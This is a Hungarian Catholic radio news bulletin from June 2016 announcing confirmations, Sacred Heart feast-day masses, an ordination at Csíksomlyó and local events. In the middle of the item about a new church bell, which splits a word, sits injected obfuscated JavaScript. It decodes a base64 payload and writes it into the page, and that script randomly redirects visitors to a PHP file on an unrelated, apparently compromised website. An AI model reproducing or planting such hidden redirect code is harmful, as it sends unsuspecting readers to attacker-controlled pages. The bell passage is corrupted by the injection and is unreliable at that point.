2016. június 3. – Hírek és programajánló

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében ma Szentháromságon tartják az örökös szentségimádási napot. Szánjunk időt az engesztelésre és adjunk hálát Krisztusért, aki velünk maradt a legméltóságosabb Oltáriszentségben.

Folytatódnak a bérmálások
A gyulafehérvári főegyházmegyében ma a pusztakaláni Jézus Szent Szíve tiszteletére szentelt plébániatemplom búcsúünnepén, délelőtt tíz órakor 8 fiatal részesül a bérmálás szentségében Tamás József püspök kézfeltétele által. Lónyaytelepen délután öt órakor kezdődik a búcsús szentmise, melynek keretében 14 fiatalt fog megbérmálni szintén Tamás József püspök. június 4-én Déván, a Nagyboldogasszony templomban délelőtt 10 órakor 19 fiatal, délután 6 órakor a Déva-telepi Szent Antal templomban 69 fiatal részesül a bérmálás szentségében Tamás József püspök kézfeltétele által.
A temesvári egyházmegyében Dirschl Johann általános helynök június 4-én, szombaton, a perjámosi római katolikus templomban 13 fiatalnak szolgáltatja ki a bérmálás szentségét. Az ünnepi szentmise 10 órakor kezdődik. Az arad-belvárosi római katolikus templomban június 5-én, vasárnap bérmál a vikárius. A 10.30 órakor kezdődő szentmise keretében 45 fiatal részesül a második szentségben.

Elsőáldozás Temesváron
Június 5-én, vasárnap a temesvár-józsefvárosi plébániatemplomban a 11.30 órakor kezdődő magyar nyelvű szentmisén 13 gyermek részesül első alkalommal a szentáldozásban.

Jézus Szent Szíve ünnepe
Ma van Jézus Szentséges Szívének ünnepe. Egyházmegyékszerte több templom búcsú ünnepét űlik ezen a napon. A gyulafehérvári főegyházmegyében:
– Új harang kerül Gyergyóditróban az I. világháború idején rekvirált 22 mázsás nagyharang helyére. A harang, a ditrói származású, Siklódi Sándor, 2013-ban elhunyt clevelfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andi (ejtsd: klívlendi) plébános végrendeletében adományozott összegből és a hívek adományából, a székelyudvarhelyi Lázár Imre harangöntő műhelyében készült. Az új nagyharangot Jézus Szent Szíve napján, a nagytemplom búcsúünnepén Jakubinyi György érsek szenteli fel. A délelőtt tizenegy órakor kezdődő szentmisét rádiónk élő adásban közvetíti.
-Madéfalván délelőtt tizenegy órától tartják a búcsús szentmisét, az ünnepi szónok P. Bátor Botond pálos szerzetes, hargitafürdői plébános.
-Málnásfürdőn szintén ma délelőtt tizenegy órakor kezdődik a búcsús szentmise, melyen Bilibók Géza tusnádfürdői plébános prédikál.
-A székelyudvarhelyi Jézus kápolna búcsúja délután öt órakor kezdődik. A szentbeszédet Jakab Lajos vágási plébános mondja.
-A Brassó-bolonyai plébániatemplomban délután öt órától román nyelven tartják a búcsút, szónoka Marius Talos bukaresti jezsuita provinciális lesz. Este hét órától a magyar nyelvű búcsús szentmisén Simó Ferenc gyergyószentmiklósi lelkész prédikál.
- Kolozsváron, a kerekdombi Jézus Szíve templomban a búcsú délután hat órakor kezdődik. Az ünnepi szentmisét, melynek szónoka Potyó Ferenc általános helynök, rádiónk élő adásban közvetíti.
Június 4-én búcsút tartanak a Gordopn tetőn, a Jézus Szíve kilátónál. Az ünnepi szentmise, melynek szónoka Mátyás Károly székelyudvarhelyi főesperes 11 órától kezdődik. A szervezők várnak mindenkit a Gordonhegyi Jézus szíve kilátóhoz.
- A kolozsi plébániatemplom Jézus Szíve tiszteletére van felszentelve. Búcsúünnepén, szombaton délután 6 órakor Csiby József, Brassó belvárosi plébános mond szentbeszédet.
A szatmári egyházmegyében ma ünneplik búcsújukat az érkörtvélyesi, nagytarnai és tiszaveresmarti templomok. Érkörtvélyesen és Nagytarnán tizenegy órától kezdődik majd a szentmise - előbbi helyen Ulmer Mihály szakaszi plébános mond szentbeszédet, Nagytarnán pedig Ilyés Csaba nagykárolyi főesperes. Tiszaveresmarton ma este hat órától tartják a templom búcsúját Tracsek Oszkár békéscsabai segédlelkész ünnepi szónoklatával.
-Június 5-én, vasárnap lesz a Szatmári Egyházmegye búcsúünnepe, a Jézus Szíve Búcsú. A délelőtt tizenegy órától kezdődő szentmise meghívott szónoka és főcelebránsa Dr. Székely János esztergom-budapesti segédpüspök.

Elsőpénteki keresztút a Székely Kálvárián
Ma délután öt órától keresztúti ájtatosságot tartanak a szejkefürdői Ugron-kápolna felé vezető Székely Kálvárián. Várják a székelyudvarhelyieket és környékbelieket, akik családjainkért felajánlanak egy keresztútjárásnyi időt és imát. Időjárástól függetlenül minden alkalommal megtartják a szabadtéri ájtatosságot – ajánlatos ennek megfelelő lábbelit és öltözéket viselni.

Ferences papszentelés Csíksomlyón
Papszentelésre készül a Szent István királyról elnevezett Erdélyi Ferences Rendtartomány – tájékoztatta rádiónkat Borsodi L. László, ferences sajtóreferens. Szombaton, június 4-én, a csíksomlyói kegytemplomban a délelőtt fél tizenegykor kezdődő szentmise keretében Jakubinyi György gyulafehérvári érsek Guia Laurean fr. Hugó örökfogadalmas szerzetes diakónust szenteli pappá.
Hugó testvér 1988-ban született Temesváron. A jelöltségi időszakot Csíksomlyón, a noviciátust, a magyarországi Szécsényben tette le. A szászsebesi kolostor lakójaként teológiai tanulmányait a gyulafehérvári Hittudományi Főiskola és Papnevelő Intézetben végezte. Szerzetesi és papi élete jelszavát Péter apostol szavaiból választotta: „Ezüstöm, aranyom nincs, de amim van, azt neked adom.” Kísérjük őt imáinkkal, ugyanakkor kérjük az aratás Urát, hogy küldjön munkásokat aratásába.

Kiálltás a békééert
Június 4-én, szombaton a kolozsvári Szent Mihály Nőszövetség (Szentegyház utcai) dísztermében klasszikus zenével, verssel, süteményezéssel és teázással egybekötött, kézműves kiállításra hívják az érdeklődőket. A szervezők vallják, hogy a művészet segíthet minket a béke építésében. Az adományokat a krakkói Ifjúsági Világtalálkozóra készülő fiatalok megsegítésére ajánlják fel. A rendezvény este hét órakor kezdődik.

Időjárás: Továbbra is megmarad időjárásunk záporos-zivataros jellege, emellett napos időszakokra is számíthatunk. A zivatarok környezetében átmenetileg feltámadhat a szél. Ennek ellenére kora nyárias idő várható, reggel 9-15 napközben 17-24 fok közötti maximumokkal.

MRE - Hírszolgálat, 2016. június 3.

About the author

maradmin

Leave a Comment